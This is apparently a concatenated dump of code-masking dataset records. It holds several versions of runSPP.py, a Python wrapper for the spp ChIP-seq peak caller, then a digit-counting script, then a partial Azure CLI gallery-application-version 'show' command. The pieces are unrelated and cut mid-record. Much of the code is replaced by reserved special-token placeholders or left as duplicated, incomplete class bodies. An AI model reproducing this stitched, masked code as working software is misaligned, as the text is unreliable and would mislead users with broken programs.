"step-3": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\nSPPPeak = collections.namedtuple('SPPPeak',\n 'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'\n )\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use 
[default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n 
cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-4": "<mask token>\nimport os\nimport sys\nimport subprocess\nimport collections\nfrom cgatcore import experiment as E\nfrom rpy2.robjects import r as R\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\nSPPPeak = collections.namedtuple('SPPPeak',\n 'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'\n )\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in 
bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n 
\"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n 
R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-5": "'''\nrunSPP.py - wrap spp peak caller\n========================================\n\n:Tags: Python\n\nPurpose\n-------\n\nRuns the spp peak caller.\n\nThe workflow follows the tutorial at:\n\nhttp://compbio.med.harvard.edu/Supplements/ChIP-seq/tutorial.html\n\nUsage\n-----\n\nDocumentation\n-------------\n\nRequirements:\n\n* spp >= ?\n* snow >= 0.3.13\n* bedtools >= 2.21.0\n\nCode\n----\n\n'''\n\nimport os\nimport sys\nimport subprocess\nimport collections\n\nfrom cgatcore import experiment as E\n\nfrom rpy2.robjects import r as R\n\n\ndef bamToBed(infile, outfile):\n '''convert bam to bed with bedtools.'''\n\n statement = \"bamToBed -i %(infile)s > %(outfile)s\" % locals()\n\n E.debug(\"executing statement '%s'\" % statement)\n\n retcode = subprocess.call(statement,\n cwd=os.getcwd(),\n shell=True)\n if retcode < 0:\n raise OSError(\"Child was terminated by signal %i: \\n%s\\n\" %\n (-retcode, statement))\n\n return outfile\n\nSPPPeak = collections.namedtuple(\n \"SPPPeak\",\n \"contig unrefined_start unrefined_end strand \"\n \"posterior summit height refined_start refined_end median fdr\")\n\n\ndef iteratePeaks(infile):\n '''iterate of zinba peaks in infile.'''\n\n for line in infile:\n\n if line.startswith(\"#\"):\n continue\n if line.startswith(\"PEAKID\\tChrom\"):\n continue\n # skip empty lines\n if line.startswith(\"\\n\"):\n continue\n\n data = line[:-1].split(\"\\t\")\n\n if len(data) != 12:\n raise ValueError(\"could not parse line %s\" % line)\n\n # I assume these are 1-based coordinates\n data[2] = max(int(data[2]) - 1, 0)\n # end\n data[3] = int(data[3])\n # posterior\n data[5] = float(data[5])\n # summit\n data[6] = max(int(data[6]) - 1, 0)\n # height\n data[7] = int(data[7])\n # refined_start\n data[8] = max(int(data[8]) - 1, 0)\n # end\n data[9] = int(data[9])\n # median\n data[10] = int(data[10])\n # qvalue\n data[11] = float(data[11])\n\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command 
line options in sys.argv, unless *argv* is given.\n \"\"\"\n\n if not argv:\n argv = sys.argv\n\n # setup command line parser\n parser = E.OptionParser(version=\"%prog version: $Id$\",\n usage=globals()[\"__doc__\"])\n\n parser.add_option(\"-f\", \"--input-format\", dest=\"input_format\",\n type=\"choice\",\n choices=(\"bam\",),\n help=\"input file format [default=%default].\")\n\n parser.add_option(\"-w\", \"--window-size\", dest=\"window_size\", type=\"int\",\n help=\"window size [default=%default].\")\n\n parser.add_option(\"-c\", \"--control-filename\",\n dest=\"control_filename\",\n type=\"string\",\n help=\"filename of input/control data in \"\n \"bed format [default=%default].\")\n\n parser.add_option(\"-t\", \"--threads\", dest=\"threads\", type=\"int\",\n help=\"number of threads to use [default=%default].\")\n\n parser.add_option(\"-q\", \"--fdr-threshold\",\n dest=\"fdr_threshold\", type=\"float\",\n help=\"fdr threshold [default=%default].\")\n\n parser.add_option(\"-z\", \"--spp-z-threshold\", dest=\"z_threshold\", type=\"float\",\n help=\"z threshold [default=%default].\")\n\n parser.add_option(\"--bin\", dest=\"bin\", type=\"int\",\n help=\"bin tags within the specified number \"\n \" of basepairs to speed up calculation;\"\n \" increasing bin size decreases the accuracy \"\n \"of the determined parameters [default=%default]\")\n\n parser.add_option(\"--spp-srange-min\", dest=\"srange_min\", type=\"float\",\n help=\"srange gives the possible range for the \"\n \" size of the protected region;\"\n \" srange should be higher than tag length; \"\n \" making the upper boundary too high\"\n \" will increase calculation time [%default]\")\n\n parser.add_option(\"--spp-srange-max\", dest=\"srange_max\", type=\"float\",\n help=\"srange gives the possible range for the \"\n \" size of the protected region;\"\n \" srange should be higher than tag length; \"\n \" making the upper boundary too high\"\n \" will increase calculation time [%default]\")\n\n 
parser.set_defaults(\n input_format=\"bam\",\n threads=1,\n fdr_threshold=0.05,\n window_size=1000,\n offset=125,\n srange_min=50,\n srange_max=500,\n bin=5,\n z_threshold=3,\n )\n\n # add common options (-h/--help, ...) and parse command line\n (options, args) = E.start(parser, argv=argv)\n\n if len(args) != 2:\n raise ValueError(\n \"please specify a filename with sample data and an output file\")\n\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n\n # load Zinba\n R.library('spp')\n R.library('snow')\n\n # read data\n E.info(\"reading data\")\n R('''chip.data <- read.bam.tags('%s')''' % filename_sample)\n R('''input.data <- read.bam.tags('%s')''' % filename_control)\n R('''cluster = makeCluster( %i )''' % (options.threads))\n\n E.info(\"computing binding characteristics\")\n # get binding info from cross-correlation profile\n\n # srange gives the possible range for the size of the protected region;\n # srange should be higher than tag length; making the upper boundary too\n # high will increase calculation time\n\n # bin - bin tags within the specified number of basepairs to speed\n # up calculation; increasing bin size decreases the accuracy of\n # the determined parameters\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R('''binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);''' % locals())\n # print out binding peak separation distance\n options.stdout.write(\n \"shift\\t%i\\n\" % R('''binding.characteristics$peak$x''')[0])\n\n ##################################################\n ##################################################\n ##################################################\n E.info(\"plot cross correlation profile\")\n # plot cross-correlation profile\n R('''pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)''' %\n filename_output)\n R('''par(mar = 
c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);''')\n R('''plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");''')\n R('''abline(v=binding.characteristics$peak$x,lty=2,col=2)''')\n R('''dev.off();''')\n\n E.info(\"selecting informative tags based on the binding characteristics\")\n # select informative tags based on the binding characteristics\n R('''chip.data <- select.informative.tags(\n chip.data,binding.characteristics);''')\n R('''input.data <- select.informative.tags(\n input.data,binding.characteristics);''')\n\n E.info(\"outputting broad peaks\")\n window_size, z_threshold = options.window_size, options.z_threshold\n R('''broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))''' % locals())\n # write out in broadPeak format\n R('''write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")''' %\n filename_output)\n\n # binding detection parameters desired FDR (1%). 
Alternatively, an\n # E-value can be supplied to the method calls below instead of the\n # fdr parameter the binding.characteristics contains the optimized\n # half-size for binding detection window\n R('''detection.window.halfsize <- binding.characteristics$whs;''')\n\n # determine binding positions using wtd method\n E.info(\"determining binding positions using wtd method\")\n fdr = options.fdr_threshold\n R('''bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)''' % locals())\n options.stdout.write(\"detected_peaks\\t%i\\n\" % R(\n '''sum(unlist(lapply(bp$npl,function(d) length(d$x))))''')[0])\n\n # output detected binding positions\n R('''output.binding.results(bp,\"%s.summit.txt\");''' % filename_output)\n\n R('''bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)''' % locals())\n # output using narrowPeak format\n R('''write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")''' %\n filename_output)\n\n # write footer and output benchmark information.\n E.stop()\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# Read three integers and print, for each digit 0-9, how many times that
# digit appears in the decimal representation of A * B * C.
A = int(input())
B = int(input())
C = int(input())

digits = str(A * B * C)
for d in range(10):  # must cover all ten digits 0-9, not range(9)
    # str.count tallies one digit in a single C-level pass, replacing the
    # hand-rolled inner loop with its redundant `else: continue`.
    print(digits.count(str(d)))
|
normal
|
{
"blob_id": "b43ea8c32207bf43abc3b9b490688fde0706d876",
"index": 4633,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n",
"step-3": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n",
"step-4": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10): # 9를 입력해서 첨에 틀림 !\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n ",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
@register_command('sig gallery-application version show')
class Show(AAZCommand):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class GalleryApplicationVersionsGet(AAZHttpOperation):
    """HTTP GET for a single Microsoft.Compute gallery application version.

    On a 200 response the payload is deserialized into the command
    context variable ``instance`` using the schema declared below.
    """

    CLIENT_TYPE = 'MgmtClient'

    def __call__(self, *args, **kwargs):
        # Send synchronously; 200 is the only success status for this GET,
        # anything else is routed to the shared ODataV4 error handler.
        req = self.make_request()
        sess = self.client.send_request(request=req, stream=False, **kwargs)
        if sess.http_response.status_code in [200]:
            return self.on_200(sess)
        return self.on_error(sess.http_response)

    @property
    def url(self):
        # ARM resource-id template; placeholders come from url_parameters.
        return self.client.format_url(
            '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}',
            **self.url_parameters
        )

    @property
    def method(self):
        return 'GET'

    @property
    def error_format(self):
        # Error bodies from this endpoint follow the OData v4 error shape.
        return 'ODataV4Format'

    @property
    def url_parameters(self):
        params = {
            **self.serialize_url_param(
                'galleryApplicationName', self.ctx.args.gallery_application_name,
                required=True,
            ),
            **self.serialize_url_param(
                'galleryApplicationVersionName',
                self.ctx.args.gallery_application_version_name,
                required=True,
            ),
            **self.serialize_url_param(
                'galleryName', self.ctx.args.gallery_name,
                required=True,
            ),
            **self.serialize_url_param(
                'resourceGroupName', self.ctx.args.resource_group,
                required=True,
            ),
            **self.serialize_url_param(
                'subscriptionId', self.ctx.subscription_id,
                required=True,
            ),
        }
        return params

    @property
    def query_parameters(self):
        params = {
            **self.serialize_query_param('$expand', self.ctx.args.expand),
            **self.serialize_query_param('api-version', '2022-01-03', required=True),
        }
        return params

    @property
    def header_parameters(self):
        params = {
            **self.serialize_header_param('Accept', 'application/json'),
        }
        return params

    def on_200(self, session):
        # Deserialize the JSON body and publish it as ``instance`` in the
        # command context, validated against the lazily-built 200 schema.
        payload = self.deserialize_http_content(session)
        self.ctx.set_var(
            'instance', payload,
            schema_builder=self._build_schema_on_200,
        )

    # Cached response schema, shared by all instances of this operation.
    _schema_on_200 = None

    @classmethod
    def _build_schema_on_200(cls):
        """Build (once) and return the response schema for the 200 payload."""
        if cls._schema_on_200 is not None:
            return cls._schema_on_200

        cls._schema_on_200 = AAZObjectType()
        schema = cls._schema_on_200

        # Top-level ARM resource envelope.
        schema.id = AAZStrType(flags={'read_only': True})
        schema.location = AAZStrType(flags={'required': True})
        schema.name = AAZStrType(flags={'read_only': True})
        schema.properties = AAZObjectType(flags={'client_flatten': True})
        schema.tags = AAZDictType()
        schema.type = AAZStrType(flags={'read_only': True})

        props = schema.properties
        props.provisioning_state = AAZStrType(
            serialized_name='provisioningState', flags={'read_only': True},
        )
        props.publishing_profile = AAZObjectType(
            serialized_name='publishingProfile', flags={'required': True},
        )
        props.replication_status = AAZObjectType(serialized_name='replicationStatus')

        profile = props.publishing_profile
        profile.advanced_settings = AAZDictType(serialized_name='advancedSettings')
        profile.enable_health_check = AAZBoolType(serialized_name='enableHealthCheck')
        profile.end_of_life_date = AAZStrType(serialized_name='endOfLifeDate')
        profile.exclude_from_latest = AAZBoolType(serialized_name='excludeFromLatest')
        profile.manage_actions = AAZObjectType(serialized_name='manageActions')
        profile.published_date = AAZStrType(
            serialized_name='publishedDate', flags={'read_only': True},
        )
        profile.replica_count = AAZIntType(serialized_name='replicaCount')
        profile.replication_mode = AAZStrType(serialized_name='replicationMode')
        profile.settings = AAZObjectType()
        profile.source = AAZObjectType(flags={'required': True})
        profile.storage_account_type = AAZStrType(serialized_name='storageAccountType')
        profile.target_extended_locations = AAZListType(
            serialized_name='targetExtendedLocations')
        profile.target_regions = AAZListType(serialized_name='targetRegions')

        profile.advanced_settings.Element = AAZStrType()

        manage_actions = profile.manage_actions
        manage_actions.install = AAZStrType(flags={'required': True})
        manage_actions.remove = AAZStrType(flags={'required': True})
        manage_actions.update = AAZStrType()

        settings = profile.settings
        settings.config_file_name = AAZStrType(serialized_name='configFileName')
        settings.package_file_name = AAZStrType(serialized_name='packageFileName')

        source = profile.source
        source.default_configuration_link = AAZStrType(
            serialized_name='defaultConfigurationLink')
        source.media_link = AAZStrType(
            serialized_name='mediaLink', flags={'required': True},
        )

        # Per-extended-location replication target (shares the encryption
        # sub-schema with target_regions via _ShowHelper).
        profile.target_extended_locations.Element = AAZObjectType()
        elem = profile.target_extended_locations.Element
        elem.encryption = AAZObjectType()
        _ShowHelper._build_schema_encryption_images_read(elem.encryption)
        elem.extended_location = AAZObjectType(serialized_name='extendedLocation')
        elem.extended_location_replica_count = AAZIntType(
            serialized_name='extendedLocationReplicaCount')
        elem.name = AAZStrType()
        elem.storage_account_type = AAZStrType(serialized_name='storageAccountType')

        ext_loc = elem.extended_location
        ext_loc.name = AAZStrType()
        ext_loc.type = AAZStrType()

        # Per-region replication target.
        profile.target_regions.Element = AAZObjectType()
        elem = profile.target_regions.Element
        elem.encryption = AAZObjectType()
        _ShowHelper._build_schema_encryption_images_read(elem.encryption)
        elem.name = AAZStrType(flags={'required': True})
        elem.regional_replica_count = AAZIntType(serialized_name='regionalReplicaCount')
        elem.storage_account_type = AAZStrType(serialized_name='storageAccountType')

        repl_status = props.replication_status
        repl_status.aggregated_state = AAZStrType(
            serialized_name='aggregatedState', flags={'read_only': True},
        )
        repl_status.summary = AAZListType(flags={'read_only': True})

        repl_status.summary.Element = AAZObjectType()
        elem = repl_status.summary.Element
        elem.details = AAZStrType(flags={'read_only': True})
        elem.progress = AAZIntType(flags={'read_only': True})
        elem.region = AAZStrType(flags={'read_only': True})
        elem.state = AAZStrType(flags={'read_only': True})

        schema.tags.Element = AAZStrType()

        return cls._schema_on_200
class _ShowHelper:
    """Helper class for Show"""

    # Cached ``EncryptionImages`` schema fragment, built on first use and
    # shared by every caller of _build_schema_encryption_images_read.
    _schema_encryption_images_read = None

    @classmethod
    def _build_schema_encryption_images_read(cls, _schema):
        """Attach the (cached) encryption-images sub-schema onto *_schema*."""
        if cls._schema_encryption_images_read is None:
            schema = AAZObjectType()
            cls._schema_encryption_images_read = schema

            schema.data_disk_images = AAZListType(serialized_name='dataDiskImages')
            schema.os_disk_image = AAZObjectType(serialized_name='osDiskImage')

            schema.data_disk_images.Element = AAZObjectType()
            disk_elem = schema.data_disk_images.Element
            disk_elem.disk_encryption_set_id = AAZStrType(
                serialized_name='diskEncryptionSetId')
            disk_elem.lun = AAZIntType(flags={'required': True})

            os_disk_image = schema.os_disk_image
            os_disk_image.disk_encryption_set_id = AAZStrType(
                serialized_name='diskEncryptionSetId')
            os_disk_image.security_profile = AAZObjectType(
                serialized_name='securityProfile')

            security_profile = os_disk_image.security_profile
            security_profile.confidential_vm_encryption_type = AAZStrType(
                serialized_name='confidentialVMEncryptionType')
            security_profile.secure_vm_disk_encryption_set_id = AAZStrType(
                serialized_name='secureVMDiskEncryptionSetId')

        # Wire the shared fragment into the caller-supplied schema node.
        _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images
        _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@register_command('sig gallery-application version show')
class Show(AAZCommand):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
_args_schema = cls._args_schema
_args_schema.gallery_application_name = AAZStrArg(options=[
'--application-name', '--gallery-application-name'], help=
'The name of the gallery application.', required=True, id_part=
'child_name_1')
_args_schema.gallery_application_version_name = AAZStrArg(options=[
'-n', '--name', '--version-name',
'--gallery-application-version-name'], help=
'The name of the gallery application version.', required=True,
id_part='child_name_2')
_args_schema.gallery_name = AAZStrArg(options=['-r',
'--gallery-name'], help='Gallery name.', required=True, id_part
='name')
_args_schema.resource_group = AAZResourceGroupNameArg(help=
'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'
, required=True)
_args_schema.expand = AAZStrArg(options=['--expand'], help=
'The expand expression to apply on the operation. "ReplicationStatus" Default value is None.'
, enum={'ReplicationStatus': 'ReplicationStatus'})
return cls._args_schema
    def _execute_operations(self):
        """Run pre-hooks, the single HTTP GET operation, then post-hooks."""
        self.pre_operations()
        self.GalleryApplicationVersionsGet(ctx=self.ctx)()
        self.post_operations()
    @register_callback
    def pre_operations(self):
        """Extension hook invoked before the GET request is sent."""
        pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class GalleryApplicationVersionsGet(AAZHttpOperation):
    """HTTP GET for a single Microsoft.Compute gallery application version.

    On a 200 response the payload is deserialized into the command
    context variable ``instance`` using the schema declared below.
    """

    CLIENT_TYPE = 'MgmtClient'

    def __call__(self, *args, **kwargs):
        # Send synchronously; 200 is the only success status for this GET,
        # anything else is routed to the shared ODataV4 error handler.
        req = self.make_request()
        sess = self.client.send_request(request=req, stream=False, **kwargs)
        if sess.http_response.status_code in [200]:
            return self.on_200(sess)
        return self.on_error(sess.http_response)

    @property
    def url(self):
        # ARM resource-id template; placeholders come from url_parameters.
        return self.client.format_url(
            '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}',
            **self.url_parameters
        )

    @property
    def method(self):
        return 'GET'

    @property
    def error_format(self):
        # Error bodies from this endpoint follow the OData v4 error shape.
        return 'ODataV4Format'

    @property
    def url_parameters(self):
        params = {
            **self.serialize_url_param(
                'galleryApplicationName', self.ctx.args.gallery_application_name,
                required=True,
            ),
            **self.serialize_url_param(
                'galleryApplicationVersionName',
                self.ctx.args.gallery_application_version_name,
                required=True,
            ),
            **self.serialize_url_param(
                'galleryName', self.ctx.args.gallery_name,
                required=True,
            ),
            **self.serialize_url_param(
